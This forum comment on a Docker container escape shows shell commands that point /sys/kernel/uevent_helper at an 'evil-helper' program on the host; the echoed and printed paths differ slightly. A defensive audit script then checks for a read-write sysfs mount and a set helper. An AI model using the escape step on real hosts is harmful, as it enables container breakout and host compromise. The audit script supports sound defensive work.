by stevekemp
4269 days ago
We don't need to argue about this, but I see the same permission-denied issue as you, but that doesn't matter. The /sys is mounted already and reading/writing to it succeeds:

    / # mount -t sysfs sysfs /sys
    mount: permission denied (are you root?)
    / # echo /var/lib/docker/aufs/mnt/638ae26bb710384a8ebade3a66049277affea8b0f3e96003d351f167a9706aef/tmp/evil-helper > /sys/kernel/uevent_helper
    / # cat /sys/kernel/uevent_helper
    /var/lib/docker/aufs/mnt/638ae26bb710384a8ebade3a66049277affea8b0f3e96003d351f167a906aef/tmp/evil-helper

From there the attack works. Obviously the change here is that I need to know the full UID, which is a cheat, but ..
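A defender-side check for the two conditions the comment above relies on (sysfs mounted read-write inside the container, and /sys/kernel/uevent_helper pointing at a program), added here as an example and not part of the original comment. The function names are hypothetical, the sample mount lines and helper path are constructed, and it is assumed to be run from inside the container being audited.

```shell
#!/bin/sh
# Added example (not from the original comment). Run inside a container.
# Flags the two conditions the comment relies on: sysfs mounted read-write,
# and /sys/kernel/uevent_helper pointing at a program.

# sysfs_is_rw MOUNTS_FILE: exit 0 if any sysfs entry carries the "rw" option.
sysfs_is_rw() {
    awk '$3 == "sysfs" {
             n = split($4, opt, ",")
             for (i = 1; i <= n; i++) if (opt[i] == "rw") found = 1
         }
         END { exit (found ? 0 : 1) }' "$1"
}

# helper_value HELPER_FILE: print the configured helper path, or nothing.
helper_value() {
    [ -r "$1" ] || return 0
    tr -d '\n' < "$1"
}

# audit_uevent_helper [MOUNTS_FILE] [HELPER_FILE]
# Defaults are the live paths; prints findings and returns 1 if any.
audit_uevent_helper() {
    mounts=${1:-/proc/mounts}
    helper=${2:-/sys/kernel/uevent_helper}
    rc=0
    if sysfs_is_rw "$mounts"; then
        echo "WARN: sysfs is mounted read-write"
        rc=1
    fi
    val=$(helper_value "$helper")
    if [ -n "$val" ]; then
        echo "WARN: uevent_helper is set to $val"
        rc=1
    fi
    [ "$rc" -eq 0 ] && echo "OK: sysfs read-only, uevent_helper empty"
    return "$rc"
}

# Constructed sample input (not captured from a real host).
demo_dir=$(mktemp -d)
printf 'sysfs /sys sysfs rw,nosuid,nodev,noexec,relatime 0 0\n' > "$demo_dir/mounts_rw"
printf 'sysfs /sys sysfs ro,nosuid,nodev,noexec,relatime 0 0\n' > "$demo_dir/mounts_ro"
printf '/tmp/constructed-helper\n' > "$demo_dir/helper_set"
: > "$demo_dir/helper_empty"

audit_uevent_helper "$demo_dir/mounts_rw" "$demo_dir/helper_set" || true
audit_uevent_helper "$demo_dir/mounts_ro" "$demo_dir/helper_empty"
```

Calling `audit_uevent_helper` with no arguments checks the live /proc/mounts and /sys/kernel/uevent_helper instead of the constructed files.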